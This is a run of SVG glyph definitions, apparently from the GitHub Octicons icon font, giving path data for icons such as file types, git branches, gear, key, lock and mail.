<glyph glyph-name="file-pdf" unicode="&#xf014;" d="M544 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h640c35 0 64 29 64 64V544L544 768zM64 704h256c-7-2-13-6-20-13-6-6-11-16-15-30-7-25-9-57-6-94s11-75 22-115c-15-47-39-103-71-170s-51-106-58-118c-9-3-23-9-44-19-21-9-42-23-64-41V704z m283-307c29-72 54-117 75-134s41-29 60-34c-41-6-79-13-116-21-36-8-75-21-116-38 1 1 14 28 39 80s45 101 58 147z m357-461H96c-4 0-8 1-11 2 13 4 29 13 47 28 29 24 67 74 114 152 20 8 37 15 52 20l27 9c29 8 60 15 92 21 32 5 64 10 95 13 29-14 58-25 89-34 31-8 58-13 79-15 9 0 17 1 24 2v-198z m0 311c-12 7-26 13-41 18-15 4-31 6-48 7-25 0-51-2-79-5-15 4-36 18-63 41s-55 73-84 149c8 53 12 95 13 126s1 47 0 48c3 26-2 45-13 56s-24 17-39 17h162l192-192v-265z" horiz-adv-x="768" />
<glyph glyph-name="file-submodule" unicode="&#xf017;" d="M640 384H256v-448h576c35 0 64 29 64 64V320H640v64z m-64-128H320v64h256v-64z m256 320H448v64c0 42-20 64-64 64H64c-35 0-64-29-64-64v-640c0-35 29-64 64-64h128V384c0 35 29 64 64 64h384c35 0 64-29 64-64h192V512c0 35-29 64-64 64z m-448 0H64v64h320v-64z" horiz-adv-x="896" />
<glyph glyph-name="file-symlink-directory" unicode="&#xf0b1;" d="M832 576H448v64c0 42-20 64-64 64H64c-35 0-64-29-64-64v-640c0-35 29-64 64-64h768c35 0 64 29 64 64V512c0 35-29 64-64 64zM64 640h320v-64H64v64z m384-576V192c-63 1-118-14-163-45s-76-80-93-147c1 105 25 184 72 239 47 54 108 81 184 81V448l256-192-256-192z" horiz-adv-x="896" />
<glyph glyph-name="file-symlink-file" unicode="&#xf0b0;" d="M544 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h640c35 0 64 29 64 64V544L544 768z m160-832H64V704h448l192-192v-576zM384 544l256-192-256-192V288c-63 1-118-14-163-45s-76-80-93-147c1 105 25 184 72 239 47 54 108 81 184 81V544z" horiz-adv-x="768" />
<glyph glyph-name="file-text" unicode="&#xf011;" d="M384 512H128v64h256v-64zM128 320h448v64H128v-64z m0-128h448v64H128v-64z m0-128h448v64H128v-64z m640 480v-608c0-35-29-64-64-64H64c-35 0-64 29-64 64V704c0 35 29 64 64 64h480l224-224z m-64-32L512 704H64v-768h640V512z" horiz-adv-x="768" />
<glyph glyph-name="file-zip" unicode="&#xf013;" d="M544 768H64C29 768 0 739 0 704v-768c0-35 29-64 64-64h640c35 0 64 29 64 64V544L544 768z m160-832H64V704h192v-64h64v64h192l192-192v-576zM320 576v64h64v-64h-64z m-64 0h64v-64h-64v64z m64-128v64h64v-64h-64z m-64 0h64v-64h-64v64z m64-128v64h64v-64h-64z m-64-82c-38-22-64-63-64-110v-64h256v64c0 71-57 128-128 128v64h-64v-82z m128-46v-64H256v64h128z" horiz-adv-x="768" />
<glyph glyph-name="flame" unicode="&#xf0d2;" d="M323 812c52-139 26-216-33-276-63-67-163-117-232-215-93-131-109-418 226-493-141 74-171 289-19 423-39-130 34-213 124-183 89 30 147-34 145-107-1-50-20-92-72-116 219 38 306 219 306 356 0 182-162 206-80 359-97-8-130-72-121-176 6-69-65-115-119-85-43 26-42 76-4 114 80 79 112 262-120 398l-1 1z" horiz-adv-x="768" />
<glyph glyph-name="fold" unicode="&#xf0cc;" d="M448 256l192-192H512v-192H384V64H256l192 192z m192 384H512V832H384v-192H256l192-192 192 192z m256-128c0 35-29 64-64 64H672l-64-64h192L672 384H224L96 512h192l-64 64H64c-35 0-64-29-64-64l160-160L0 192c0-35 29-64 64-64h160l64 64H96l128 128h448l128-128H608l64-64h160c35 0 64 29 64 64L736 352l160 160z" horiz-adv-x="896" />
<glyph glyph-name="gear" unicode="&#xf02f;" d="M896 271V373l-124 41-29 70 56 118-72 72-116-58-70 29-44 123H395l-40-124-71-29-118 56-72-72 58-116-29-70L0 369v-102l124-41 29-70-56-118 72-72 116 58 70-29 44-123h102l40 124 71 29 118-56 72 72-59 116 30 70 123 44zM448 128c-106 0-192 86-192 192s86 192 192 192 192-86 192-192-86-192-192-192z" horiz-adv-x="896" />
<glyph glyph-name="gift" unicode="&#xf042;" d="M832 576h-88c12 21 21 43 23 58 4 43-7 78-33 103-23 24-52 31-87 31-3 0-5 0-7 0-34-1-71-16-98-37s-47-46-62-77c-15 31-35 56-62 77s-64 37-98 37c-1 0-2 0-2 0-36 0-68-6-92-31-26-25-37-60-33-103 2-15 11-37 23-58h-88c-35 0-64-29-64-64v-192h64v-320c0-35 29-64 64-64h576c35 0 64 29 64 64V320h64V512c0 35-29 64-64 64z m-306 56c11 23 27 43 48 59 19 15 46 25 67 26h6c29 0 42-7 51-16s21-25 19-61c-3-12-16-39-32-64H500l26 56z m-264 69c8 8 20 16 58 16 20 0 46-11 66-26 21-16 37-35 48-59l27-56H275c-16 25-29 52-32 64-2 36 10 52 19 61z m186-701H192V320h256v-320z m0 384H128V512h320v-128z m320-384H512V320h256v-320z m64 384H512V512h320v-128z" horiz-adv-x="896" />
<glyph glyph-name="gist" unicode="&#xf00e;" d="M480 512l160-160-160-160-48 48 112 112-112 112 48 48z m-192 0L128 352l160-160 48 48-112 112 112 112-48 48zM0 0V704c0 35 29 64 64 64h640c35 0 64-29 64-64v-704c0-35-29-64-64-64H64c-35 0-64 29-64 64z m64 0h640V704H64v-704z" horiz-adv-x="768" />
<glyph glyph-name="gist-secret" unicode="&#xf08c;" d="M512 160l64-224H320l64 224-48 96h224l-48-96z m128 288H256l-128-64h640l-128 64z m-64 256l-128-64-128 64-64-192h384l-64 192z m258-496l-194 48 64-128-128-192h206c29 0 55 20 62 48l36 146c9 34-12 69-46 78z m-578 48L62 208c-34-9-55-44-46-78l36-146c7-28 33-48 62-48h206L192 128l64 128z" horiz-adv-x="896" />
<glyph glyph-name="git-branch" unicode="&#xf020;" d="M640 512c0 71-57 128-128 128s-128-57-128-128c0-47 26-88 64-110v-19c-1-33-15-63-40-88s-55-39-88-40c-53-1-95-10-128-29V530c38 22 64 63 64 110 0 71-57 128-128 128S0 711 0 640c0-47 26-88 64-110v-420C26 88 0 47 0 0c0-71 57-128 128-128s128 57 128 128c0 34-13 64-34 87 6 4 31 26 38 30 16 7 36 11 60 11 67 3 125 29 176 80s77 127 80 193h-1c39 23 65 64 65 111zM128 717c42 0 77-35 77-77s-35-77-77-77-77 35-77 77 35 77 77 77z m0-794c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z m384 512c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z" horiz-adv-x="640" />
<glyph glyph-name="git-commit" unicode="&#xf01f;" d="M695 384c-29 110-128 192-247 192s-218-82-247-192H0v-128h201c29-110 128-192 247-192s218 82 247 192h201V384H695zM448 179c-78 0-141 63-141 141s63 141 141 141 141-63 141-141-63-141-141-141z" horiz-adv-x="896" />
<glyph glyph-name="git-compare" unicode="&#xf0ac;" d="M320 64h-64c-17 1-31 7-44 20s-19 27-20 44V530c38 22 64 63 64 110 0 71-57 128-128 128S0 711 0 640c0-47 26-88 64-110 0-111 0-402 0-402 2-50 22-94 60-132s82-58 132-60c0 0 65 0 64 0v-128l192 192-192 192v-128zM128 717c42 0 77-35 77-77s-35-77-77-77-77 35-77 77 35 77 77 77z m704-607c0 111 0 402 0 402-2 50-22 94-60 132s-82 58-132 60c0 0-65 0-64 0V832L384 640l192-192V576h64c17-1 31-7 44-20s19-27 20-44v-402c-38-22-64-63-64-110 0-71 57-128 128-128s128 57 128 128c0 47-26 88-64 110z m-64-187c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z" horiz-adv-x="896" />
<glyph glyph-name="git-merge" unicode="&#xf023;" d="M640 384c-47 0-88-26-111-65v1c-67 1-145 23-200 65-48 37-96 103-121 156 29 23 48 59 48 99 0 71-57 128-128 128S0 711 0 640c0-47 26-88 64-110v-420C26 88 0 47 0 0c0-71 57-128 128-128s128 57 128 128c0 47-26 88-64 110V341c43-45 92-81 147-108s130-40 190-41v1c23-39 64-65 111-65 71 0 128 57 128 128s-57 128-128 128zM205 0c0-42-35-77-77-77s-77 35-77 77 35 77 77 77 77-35 77-77z m-77 563c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z m512-384c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z" horiz-adv-x="768" />
<glyph glyph-name="git-pull-request" unicode="&#xf009;" d="M704 110c0 111 0 402 0 402-2 50-22 94-60 132s-82 58-132 60c0 0-65 0-64 0V832L256 640l192-192V576h64c17-1 31-7 44-20s19-27 20-44v-402c-38-22-64-63-64-110 0-71 57-128 128-128s128 57 128 128c0 47-26 88-64 110z m-64-187c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77zM256 640c0 71-57 128-128 128S0 711 0 640c0-47 26-88 64-110 0-99 0-356 0-420-38-22-64-63-64-110 0-71 57-128 128-128s128 57 128 128c0 47-26 88-64 110V530c38 22 64 63 64 110z m-51-640c0-42-35-77-77-77s-77 35-77 77 35 77 77 77 77-35 77-77z m-77 563c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z" horiz-adv-x="768" />
<glyph glyph-name="globe" unicode="&#xf0b6;" d="M448 768C201 768 0 567 0 320s201-448 448-448c31 0 60 3 88 9-11 5-13 47-1 70 12 26 52 93 13 115s-28 32-52 58-14 30-16 37c-5 22 23 57 25 60 1 4 1 17 0 21 0 5-17 14-22 15-4 0-7-7-13-8s-32 16-38 21-9 15-17 22c-8 8-9 2-21 7s-51 20-82 31c-31 12-33 30-33 42-1 13-19 30-27 43-9 13-10 30-13 26s16-50 13-52c-3-1-10 13-19 24-9 12 9 6-19 61s9 83 11 112 24-11 12 8 0 57-9 71c-8 14-56-16-56-16 1 14 44 37 74 59s50 4 74-3c25-8 26-6 18 3-8 8 4 11 23 8 18-3 24-26 53-23 30 2 3-6 7-14s-4-7-24-19c-19-13 1-14 35-39s24 16 20 35 25 4 25 4c21-14 17-1 32-5s58-41 58-41c-53-28-20-31-11-38s-18-19-18-19c-11 11-12-1-19-5s-1-14-1-14c-36-6-28-44-27-53 0-9-24-23-30-37-6-13 16-41 4-42-12-2-22 42-84 26-19-5-60-26-38-69 23-44 59 12 71 6s-4-34-1-35 34-1 36-39 49-34 59-35c11 0 45 28 49 29 4 2 24 18 66-6 42-23 63-20 77-30s5-30 18-37 68 2 82-20-56-134-78-146-31-41-54-59-52-41-81-58c-26-15-30-42-42-51 201 45 351 224 351 438 0 247-201 448-448 448z m105-420c-6-2-18-14-50 5-31 19-52 15-55 18 0 0-3 7 11 9 28 3 63-26 71-26s12 8 26 3 3-8-3-9zM406 723c-3 2 2 5 6 9 2 2 1 7 3 9 7 7 39 16 33-2-7-17-37-19-42-16z m79-57c-12 1-37 3-33 9 19 18-6 24-22 24-16 1-22 10-14 12s39-1 45-5c5-4 33-16 35-24 1-8 0-16-11-16z m94 3c-9-6-53 26-61 33-36 31-57 20-64 26s-5 12 7 22 44-4 64-6c19-2 42-17 42-35 1-16 21-32 12-40z" horiz-adv-x="896" />
<glyph glyph-name="graph" unicode="&#xf043;" d="M1024-64v-64H0V832h64v-896h960z m-704 64H192V320h128v-320z m256 0H448V640h128v-640z m256 0H704V448h128v-448z" horiz-adv-x="1024" />
<glyph glyph-name="heart" unicode="&#x2665;" d="M717 576c-33 40-80 61-141 64-62 0-108-27-141-64s-50-59-51-64c-1 5-18 27-51 64s-75 64-141 64c-61-3-108-24-141-64-33-39-50-82-51-128 0-33 6-97 43-171s150-188 341-341c191 153 305 267 342 341s42 139 42 171c-1 46-18 89-51 129z" horiz-adv-x="768" />
<glyph glyph-name="history" unicode="&#xf07e;" d="M512 0H384V448h320v-128H512v-320zM448 768c-140 0-264-65-346-166L0 704v-256h256l-96 96c67 85 171 141 288 141 201 0 365-164 365-365S649-45 448-45 83 119 83 320c0 22 2 43 6 64H5c-3-21-5-42-5-64 0-247 201-448 448-448s448 201 448 448S695 768 448 768z" horiz-adv-x="896" />
<glyph glyph-name="home" unicode="&#xf08d;" d="M1024 256L832 448V704H704v-128L512 768 0 256h128l64-320c0-35 29-64 64-64h512c35 0 64 29 64 64l64 320h128zM768-64H576V192H448v-256H256l-76 404 332 332 332-332-76-404z" horiz-adv-x="1024" />
<glyph glyph-name="horizontal-rule" unicode="&#xf070;" d="M64 384h128v-128h64V640h-64v-192H64V640H0v-384h64V384z m576-128V384h-64v-128h64z m0 192V576h-64v-128h64z m-192 0V576h128v64H384v-384h64V384h128v64H448zM0 0h640V128H0v-128z" horiz-adv-x="640" />
<glyph glyph-name="hubot" unicode="&#xf09d;" d="M192 448c-35 0-64-29-64-64v-128c0-35 29-64 64-64h512c35 0 64 29 64 64V384c0 35-29 64-64 64H192z m512-112l-80-80h-96l-80 80-80-80h-96l-80 80v48h48l80-80 80 80h96l80-80 80 80h48v-48zM320 128h256v-64H320v64z m128 576C201 704 0 518 0 288v-288c0-35 29-64 64-64h768c35 0 64 29 64 64V288c0 230-201 416-448 416z m384-704H64V288c0 198 169 358 384 358s384-160 384-358v-288z" horiz-adv-x="896" />
<glyph glyph-name="inbox" unicode="&#xf0cf;" d="M896 256l-72 457c-5 31-32 55-64 55H136c-32 0-59-24-64-55L0 256v-320c0-35 29-64 64-64h768c35 0 64 29 64 64V256z m-210-35l-28-57c-11-22-33-36-58-36H295c-24 0-46 14-57 35l-28 58c-11 21-33 35-57 35H64l64 448h640l64-448h-88c-25 0-47-14-58-35z" horiz-adv-x="896" />
<glyph glyph-name="info" unicode="&#xf059;" d="M403 468c-12 12-18 27-18 45s6 33 18 45 27 18 45 18 33-6 45-18 18-27 18-45-6-33-18-45-27-19-45-19-33 7-45 19z m109-147c-1 16-7 31-20 44-13 12-27 19-44 20h-64c-17-1-31-8-44-20-13-13-19-28-20-44h64v-192c1-17 7-32 20-44 13-13 27-20 44-20h64c17 0 31 7 44 20 13 12 19 27 20 44h-64V321z m-64 364C247 685 83 522 83 321s164-365 365-365 365 163 365 365-164 364-365 364m0 84c247 0 448-201 448-448S695-127 448-127 0 73 0 321 201 769 448 769z" horiz-adv-x="896" />
<glyph glyph-name="issue-closed" unicode="&#xf028;" d="M448 192h128v-128H448V192z m128 384H448v-320h128V576z m96-96l-64-64 160-160 256 288-64 64-192-224-96 96zM512-45c-201 0-365 164-365 365s164 365 365 365c117 0 221-56 288-141l59 59C777 704 652 768 512 768 265 768 64 567 64 320s201-448 448-448 448 201 448 448l-97-97c-42-154-183-268-351-268z" horiz-adv-x="1024" />
<glyph glyph-name="issue-opened" unicode="&#xf026;" d="M448 685c201 0 365-164 365-365S649-45 448-45 83 119 83 320s164 365 365 365m0 83C201 768 0 567 0 320s201-448 448-448 448 201 448 448S695 768 448 768z m64-192H384v-320h128V576z m0-384H384v-128h128V192z" horiz-adv-x="896" />
<glyph glyph-name="issue-reopened" unicode="&#xf027;" d="M512 256H384V576h128v-320zM384 64h128V192H384v-128z m405 128H640l96-96c-67-85-171-141-288-141-201 0-365 164-365 365 0 22 2 43 6 64H5c-3-21-5-42-5-64 0-247 201-448 448-448 140 0 264 65 346 166l102-102V192H789zM107 448h149l-96 96c67 85 171 141 288 141 201 0 365-164 365-365 0-22-2-43-6-64h84c3 21 5 42 5 64 0 247-201 448-448 448-140 0-264-65-346-166L0 704v-256h107z" horiz-adv-x="896" />
<glyph glyph-name="italic" unicode="&#xf0e4;" d="M180 512h127L192-64H64l116 576z m23 173c0 45 37 83 85 83 36 0 72-24 72-66 0-48-38-83-85-83-37 0-72 24-72 66z" horiz-adv-x="384" />
<glyph glyph-name="jersey" unicode="&#xf019;" d="M224 448l-32-32v-320l32-32h128l32 32V416l-32 32H224z m96-320h-64V384h64v-256z m401 464c-14 88-20 168-17 240H513c0-17-8-31-25-44-16-13-40-19-72-19s-56 6-72 19c-15 13-23 27-23 44H128c3-72-2-152-16-240-13-88-51-136-112-144v-576c1-17 7-31 20-44s27-19 44-20h704c17 1 31 7 44 20s19 27 20 44V448c-61 8-98 56-112 144z m47-720H64V384c57 32 95 80 110 144s20 144 18 240h64c-1-50 10-94 33-132 23-37 65-57 128-60 63 1 105 21 128 60 23 38 32 82 31 132h64c1-91 8-163 21-216 13-52 44-128 107-168v-512zM480 448l-32-32v-320l32-32h128l32 32V416l-32 32H480z m96-320h-64V384h64v-256z" horiz-adv-x="896" />
<glyph glyph-name="key" unicode="&#xf049;" d="M821 693c-48 48-108 73-181 75-72-2-133-27-181-75s-72-108-74-181c0-19 2-38 6-57L0 64v-64l64-64h128l64 64v64h64v64h64v64h128l70 71c19-5 38-7 58-7 73 2 133 27 181 75s73 108 75 181c-2 73-27 133-75 181zM704 488c-49 0-88 39-88 88s39 88 88 88 88-39 88-88-39-88-88-88z" horiz-adv-x="896" />
<glyph glyph-name="keyboard" unicode="&#xf00d;" d="M640 512h-64v64h64v-64z m-448-64h-64v-64h64v64z m320 128h-64v-64h64v64z m-256 0H128v-64h128v64z m512-448h128v64H768v-64zM512 384h64v64h-64v-64zM256 192H128v-64h128v64z m512 384h-64v-64h64v64z m128 0h-64v-64h64v64zM768 256h128V448H768v-192z m256 384v-576c0-35-29-64-64-64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h896c35 0 64-29 64-64z m-64 0H64v-576h896V640zM384 384h64v64h-64v-64z m0 192h-64v-64h64v64zM256 384h64v64h-64v-64z m64-256h384v64H320v-64z m320 256h64v64h-64v-64z m-448-64h-64v-64h64v64z m320 0v-64h64v64h-64z m-128 0v-64h64v64h-64z m-64 0h-64v-64h64v64z m320-64h64v64h-64v-64z" horiz-adv-x="1024" />
<glyph glyph-name="law" unicode="&#xf0d8;" d="M448 576c-53 0-96 43-96 96s43 96 96 96 96-43 96-96-43-96-96-96z m448-384c0-71-57-128-128-128h-64c-71 0-128 57-128 128l128 256h-64c-35 0-64 29-64 64h-64v-512c27 0 64-29 64-64h64c27 0 64-29 64-64H192c0 35 37 64 64 64h64c0 35 37 64 64 64h2l-2 512h-64c0-35-29-64-64-64h-64l128-256c0-71-57-128-128-128h-64C57 64 0 121 0 192l128 256H64v64h192c0 35 29 64 64 64h256c35 0 64-29 64-64h192v-64h-64l128-256zM160 384L64 192h192l-96 192z m672-192l-96 192-96-192h192z" horiz-adv-x="896" />
<glyph glyph-name="light-bulb" unicode="&#xf000;" d="M352 832C159 832 0 692 0 512c0-59 35-144 64-192 86-144 114-178 128-256v-64h320v64c14 78 42 112 128 256 29 48 64 133 64 192C704 692 545 832 352 832z m233-479c-16-28-30-51-43-71-55-90-80-132-93-207-1-3-1-7-1-11H256c0 4 0 8-1 11-13 75-38 117-93 207-13 20-27 43-43 71-27 45-55 117-55 159C64 653 193 768 352 768c78 0 151-27 206-76 53-48 82-112 82-180 0-42-28-114-55-159zM192-64h320c-15-73-83-128-160-128s-145 55-160 128z" horiz-adv-x="768" />
<glyph glyph-name="link" unicode="&#xf05c;" d="M256 256h64v-64h-64c-96 0-192 108-192 224s99 224 192 224h256c93 0 192-108 192-224 0-90-58-174-128-208v74c37 29 64 81 64 134 0 82-65 160-128 160H256c-63 0-128-78-128-160s64-160 128-160z m576 192h-64v-64h64c64 0 128-78 128-160s-65-160-128-160H576c-63 0-128 78-128 160 0 53 27 105 64 134v74c-70-34-128-118-128-208 0-116 99-224 192-224h256c93 0 192 108 192 224s-96 224-192 224z" horiz-adv-x="1024" />
<glyph glyph-name="link-external" unicode="&#xf07f;" d="M704 192h64v-192c0-35-29-64-64-64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h192v-64H64v-640h640V192zM384 704l144-144-208-208 96-96 208 208 144-144V704H384z" horiz-adv-x="768" />
<glyph glyph-name="list-ordered" unicode="&#xf062;" d="M768 0c0-38 0-64-38-64H294c-38 0-38 26-38 64s0 64 38 64h436c38 0 38-26 38-64zM294 576h436c38 0 38 26 38 64s0 64-38 64H294c-38 0-38-26-38-64s0-64 38-64z m436-192H294c-38 0-38-26-38-64s0-64 38-64h436c38 0 38 26 38 64s0 64-38 64zM128 768H82C63 756 45 752 16 746v-42h48v-137H10v-55h182v55h-64V768z m16-520c-11 0-29-2-42-4 34 36 73 80 73 121-1 50-36 83-87 83-38 0-62-13-88-41l37-37c12 12 24 24 41 24 18 0 31-10 31-33 0-34-49-77-109-132v-37h192l-6 56h-42z m-5-242v2c28 12 41 30 41 55 0 45-36 71-92 71-31 0-57-12-82-33l35-41c16 13 28 20 44 20 17 0 27-8 27-23 0-17-13-28-55-28v-48c53 0 63-11 63-30 0-16-15-24-37-24-18 0-36 9-52 24L0-92c19-23 49-36 90-36 53 0 98 26 98 74 0 32-20 52-49 60z" horiz-adv-x="768" />
<glyph glyph-name="list-unordered" unicode="&#xf061;" d="M128 0c0-38 0-64-38-64H38c-38 0-38 26-38 64s0 64 38 64h52c38 0 38-26 38-64z m166 576h436c38 0 38 26 38 64s0 64-38 64H294c-38 0-38-26-38-64s0-64 38-64zM90 384H38c-38 0-38-26-38-64s0-64 38-64h52c38 0 38 26 38 64s0 64-38 64z m0 320H38c-38 0-38-26-38-64s0-64 38-64h52c38 0 38 26 38 64s0 64-38 64z m640-320H294c-38 0-38-26-38-64s0-64 38-64h436c38 0 38 26 38 64s0 64-38 64z m0-320H294c-38 0-38-26-38-64s0-64 38-64h436c38 0 38 26 38 64s0 64-38 64z" horiz-adv-x="768" />
<glyph glyph-name="location" unicode="&#xf060;" d="M384 832C172 832 0 672 0 480c0-289 384-672 384-672s384 383 384 672C768 672 596 832 384 832z m0-931C265 31 64 292 64 480 64 639 208 768 384 768c86 0 167-31 228-87 59-55 92-126 92-201 0-188-201-449-320-579z m128 579c0-71-57-128-128-128s-128 57-128 128 57 128 128 128 128-57 128-128z" horiz-adv-x="768" />
<glyph glyph-name="lock" unicode="&#xf06a;" d="M256 0h-64v64h64v-64z m512 384v-448c0-35-29-64-64-64H64c-35 0-64 29-64 64V384c0 35 29 64 64 64h64V576C128 717 243 832 384 832s256-115 256-256v-128h64c35 0 64-29 64-64z m-525 64h282V576c0 78-63 141-141 141s-141-63-141-141v-128z m461-64H128v-448h576V384z m-448-64h-64v-64h64v64z m0-128h-64v-64h64v64z" horiz-adv-x="768" />
<glyph glyph-name="logo-gist" unicode="&#xf0ad;" d="M301 401h157v-257c-35-17-105-22-162-22-164 0-222 141-222 323S132 769 296 769c82 0 132-15 210-47V790C465 811 400 832 296 832 72 832 0 660 0 446s71-386 296-386c105 0 180 17 230 41V465H301v-64z m409-238V572h-67v-402c0-80 37-110 110-110v57c-31 0-43 10-43 45v1z m16 558c0 28-21 50-50 50s-49-22-49-50 21-50 49-50 50 22 50 50z m278-364c-96 8-114 31-114 75 0 49 21 86 120 86 67 0 106-10 145-23v60c-44 19-97 25-144 25-141 0-187-77-187-148 0-69 30-120 175-133 99-8 113-40 113-86 0-47-28-91-132-91-71 0-119 12-149 23v-60c32-13 101-25 149-25 152 0 201 77 201 154 0 82-34 130-176 143h-1z m549 158v55h-155V730l-69-20v-135l-100-28v-31h100v-320c0-98 76-136 160-136 12 0 33 1 44 3v57c-12-2-26-2-39-2-62 0-96 25-96 86V516h155v-1z" horiz-adv-x="1600" />
<glyph glyph-name="logo-github" unicode="&#xf092;" d="M553 500H312c-7 0-12-5-12-11v-118c0-6 5-11 12-11h94v-147s-21-7-80-7c-69 0-165 25-165 237s101 239 195 239c81 0 116-14 139-21 7-2 13 5 13 11l27 114c0 3-1 6-4 9-9 6-65 37-205 37C165 832 0 764 0 435s189-379 348-379c132 0 212 57 212 57 3 1 4 6 4 8V489c0 6-5 11-12 11h1zM1773 804h-136c-6 0-11-5-11-11v-262h-212V793c0 6-5 11-11 11h-136c-6 0-11-5-11-11v-711c0-6 6-11 11-11h136c6 0 11 5 11 11V386h212l-1-304c0-6 5-11 11-11h136c6 0 11 5 11 11V793c0 6-5 11-11 11h1zM716 788c-49 0-88-39-88-88s39-88 88-88c48 0 87 39 87 88s-39 88-87 88z m78-227c0 6-5 11-11 11H647c-6 0-11-6-11-13 0 0 0-395 0-470 0-13 8-17 19-17 0 0 58 0 123 0 13 0 16 6 16 17 0 25 0 471 0 471v1z m1505 10h-134c-7 0-11-5-11-12v-348s-35-25-83-25-62 22-62 70c0 47 0 304 0 304 0 6-5 11-11 11h-137c-6 0-11-5-11-11 0 0 0-186 0-327s79-176 187-176c89 0 161 49 161 49s3-25 5-29c1-3 6-6 10-6h86c7 0 11 5 11 11l1 478c0 6-5 11-12 11z m369 16c-77 0-129-34-129-34V794c0 6-5 11-11 11h-136c-6 0-11-5-11-11l-1-711c0-6 6-11 12-11h95c4 0 7 1 9 5 3 4 6 33 6 33s56-53 161-53c124 0 195 63 195 282s-113 248-190 248z m-53-401c-47 1-78 23-78 23V434s31 19 69 22c49 5 96-10 96-126 0-122-21-146-87-144z m-1429 3c-6 0-21-3-37-3-50 0-67 23-67 53s0 200 0 200h102c6 0 10 5 10 12V560c0 6-5 11-10 11h-102V706c0 5-3 8-9 8H935c-6 0-9-3-9-8v-139s-70-17-74-18c-5-1-8-6-8-11v-87c0-7 5-12 11-12h71s0-92 0-210c0-156 109-172 183-172 34 0 75 11 81 14 4 1 6 6 6 10v96c0 7-5 12-11 12h1z" horiz-adv-x="2880" />
<glyph glyph-name="mail" unicode="&#xf03b;" d="M0 576v-512c0-35 29-64 64-64h768c35 0 64 29 64 64V576c0 35-29 64-64 64H64c-35 0-64-29-64-64z m832 0L448 256 64 576h768zM64 480l256-192L64 96V480z m64-416l224 192 96-96 96 96 224-192H128z m704 32L576 288l256 192v-384z" horiz-adv-x="896" />
<glyph glyph-name="mail-read" unicode="&#xf03c;" d="M384 512H256v64h128v-64z m192-64H256v-64h320v64z m320 31v-543c0-35-29-64-64-64H64c-35 0-64 29-64 64V479c0 21 10 40 27 52l101 72v37c0 35 29 64 64 64h77L448 832l179-128h77c35 0 64-29 64-64v-37l101-72c17-12 27-31 27-52zM192 352l256-160 256 160V640H192v-288zM64-32l288 192L64 352v-384z m704-32L448 128 128-64h640z m64 416L544 160l288-192V352z" horiz-adv-x="896" />
<glyph glyph-name="mail-reply" unicode="&#xf051;" d="M384 672l-384-288 384-288v192c111 0 329-61 384-280 0 291-196 451-384 472v192z" horiz-adv-x="768" />
<glyph glyph-name="mark-github" unicode="&#xf00a;" d="M512 832C229.252 832 0 602.748 0 320c0-226.251 146.688-418.126 350.155-485.813 25.593-4.686 34.937 11.125 34.937 24.626 0 12.188-0.469 52.562-0.718 95.314-128.708-23.46-161.707 31.541-172.469 60.373-5.525 14.809-30.407 60.249-52.398 72.263-17.988 9.828-43.26 33.237-0.917 33.735 40.434 0.476 69.348-37.308 78.471-52.75 45.938-77.749 119.876-55.627 148.999-42.5 4.654 32.999 17.902 55.627 32.501 68.373-113.657 12.939-233.22 56.875-233.22 253.063 0 55.94 19.968 101.561 52.658 137.404-5.22 12.999-22.844 65.095 5.063 135.563 0 0 42.937 13.749 140.811-52.501 40.811 11.406 84.594 17.031 128.124 17.22 43.499-0.188 87.314-5.874 128.188-17.28 97.689 66.311 140.686 52.501 140.686 52.501 28-70.532 10.375-122.564 5.124-135.499 32.811-35.844 52.626-81.468 52.626-137.404 0-196.686-119.751-240-233.813-252.686 18.439-15.876 34.748-47.001 34.748-94.748 0-68.437-0.686-123.627-0.686-140.501 0-13.625 9.312-29.561 35.25-24.562C877.436-97.99800000000005 1024 93.87400000000002 1024 320 1024 602.748 794.748 832 512 832z" horiz-adv-x="1024" />
<glyph glyph-name="markdown" unicode="&#xf0c9;" d="M950.154 640H73.846C33.127 640 0 606.873 0 566.154v-492.308C0 33.125 33.127 0 73.846 0h876.308c40.721 0 73.846 33.125 73.846 73.846V566.154C1024 606.873 990.875 640 950.154 640zM576 128.125L448 128V320l-96-123.077L256 320v-192H128V512h128l96-128 96 128 128 0.125V128.125zM767.091 96.125L608 320h96V512h128v-192h96L767.091 96.125z" horiz-adv-x="1024" />
<glyph glyph-name="megaphone" unicode="&#xf077;" d="M640 768c-11 0-23-3-33-9-92-56-319-220-415-247-88 0-192-43-192-160s104-160 192-160c19-5 41-15 64-26v-294h128V93c86-55 172-117 223-148 10-6 22-9 33-9 33 0 64 27 64 64V704c0 37-31 64-64 64z m0-768c-24 15-57 37-96 64-10 7-21 14-32 22V620c10 7 20 13 30 20 39 26 74 49 98 64v-704z m128 384h256v-64H768v64z m0-128l256-128v-64L768 192v64z m256 384v-64L768 448v64l256 128z" horiz-adv-x="1024" />
<glyph glyph-name="mention" unicode="&#xf0be;" d="M421-128c80 0 161 20 228 60l-27 60c-54-33-121-53-194-53-207 0-361 133-361 366C67 585 274 765 488 765c221 0 334-140 334-333 0-153-86-247-160-247-67 0-87 47-67 140l47 240h-67l-7-46c-26 40-60 53-100 53-140 0-234-153-234-280 0-107 60-167 147-167 54 0 107 34 147 80 7-60 60-93 127-93 107 0 241 107 241 320C896 665 742 832 501 832 234 832 0 619 0 299c0-280 187-427 421-427z m-20 320c-47 0-87 33-87 107 0 93 60 206 154 206 33 0 54-13 80-53l-33-193c-40-47-80-67-114-67z" horiz-adv-x="896" />
<glyph glyph-name="milestone" unicode="&#xf075;" d="M512 704H384V832h128v-128z m256-320H128c-35 0-64 29-64 64V576c0 35 29 64 64 64h640l128-128-128-128zM512 576H384v-128h128V576z m-128-768h128V320H384v-512z" horiz-adv-x="896" />
